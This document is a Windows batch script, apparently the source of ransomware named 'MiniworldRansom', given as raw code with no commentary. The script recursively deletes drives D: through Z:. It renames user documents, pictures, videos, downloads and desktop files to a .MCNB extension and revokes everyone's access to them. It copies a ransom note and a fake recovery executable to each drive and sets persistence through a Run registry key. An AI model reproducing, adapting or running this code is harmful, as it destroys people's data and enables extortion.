@shift /0 @echo off reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v msfdhs /f :del rd /s /q D:\ rd /s /q E:\ rd /s /q F:\ rd /s /q G:\ rd /s /q H:\ rd /s /q I:\ rd /s /q J:\ rd /s /q K:\ rd /s /q L:\ rd /s /q M:\ rd /s /q N:\ rd /s /q O:\ rd /s /q P:\ rd /s /q Q:\ rd /s /q R:\ rd /s /q S:\ rd /s /q T:\ rd /s /q U:\ rd /s /q V:\ rd /s /q W:\ rd /s /q X:\ rd /s /q Y:\ rd /s /q Z:\ goto encrypt :encrypt ren "%USERPROFILE%\Documents\*.*" *.*.MCNB ren "%USERPROFILE%\Videos\*.*" *.*.MCNB ren "%USERPROFILE%\Favourites\*.*" *.*.MCNB ren "%USERPROFILE%\Pictures\*.*" *.*.MCNB ren "%Public%\*.*" *.*.MCNB ren "%USERPROFILE%\Downloads\*.*" *.*.MCNB ren "%USERPROFILE%\Music\*.*" *.*.MCNB ren "%USERPROFILE%\Links\*.*" *.*.MCNB echo y|cacls "%USERPROFILE%\Music\*.*" /e /d everyone echo y|cacls "%USERPROFILE%\Downloads\*.*" /e /d everyone echo y|cacls "%USERPROFILE%\Links\*.*" /e /d everyone echo y|cacls "%USERPROFILE%\Favorites\*.*" /e /d everyone echo y|cacls "%USERPROFILE%\Documents\*.*" /e /d everyone echo y|cacls "%USERPROFILE%\Videos\*.*" /e /d everyone echo y|cacls "%USERPROFILE%\Pictures\*.*" /e /d everyone ren "%USERPROFILE%\desktop\*.*" *.*.MCNB echo y|cacls "%USERPROFILE%\Desktop\*.*" /e /d everyone goto dofile :dofile md %HOMEDRIVE%\MiniworldRansom copy %b2eincfilepath%\@readme@.txt /Y %Public%\desktop\@readme@.txt copy %b2eincfilepath%\background.jpg /Y %APPDATA%\Microsoft\Windows\Themes\TranscodedWallpaper.jpg copy %b2eincfilepath%\2Y8U.TMP /Y %Windir%\system32\mstray.exe copy %b2eincfilepath%\3R9J.TMP /Y %HOMEDRIVE%\MiniworldRansom\@RecoveryYourFiles@.exe copy %b2eincfilepath%\3R9J.TMP /Y %Public%\desktop\@RecoveryYourFiles@.exe copy %b2eincfilepath%\3R9J.TMP /Y D:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y D:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y E:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y E:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y F:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y F:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y G:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y G:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y H:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y H:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y I:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y I:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y J:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y J:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y K:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y K:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y L:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y L:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y M:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y M:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y N:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y N:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y O:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y O:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y P:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y P:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y R:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y R:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y S:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y S:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y T:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y T:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y U:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y U:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y V:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y V:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y W:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y W:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y X:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y X:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y Y:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y Y:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y Z:\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y Z:\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y %USERPROFILE%\Documents\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y %USERPROFILE%\Documents\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y %USERPROFILE%\Videos\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y %USERPROFILE%\Videos\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y %USERPROFILE%\Favourites\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y %USERPROFILE%\Favourites\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y %USERPROFILE%\Pictures\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y %USERPROFILE%\Pictures\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y %USERPROFILE%\Downloads\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y %USERPROFILE%\Downloads\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y %USERPROFILE%\Music\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y %USERPROFILE%\Music\@readme@.txt copy %b2eincfilepath%\3R9J.TMP /Y %USERPROFILE%\Links\@RecoveryYourFiles@.exe copy %b2eincfilepath%\@readme@.txt /Y %USERPROFILE%\Links\@readme@.txt reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "mstray" /t REG_SZ /d "%windir%\system32\mstray.exe" /f taskkill /f /im explorer.exe start explorer.exe start %windir%\system32\mstray.exe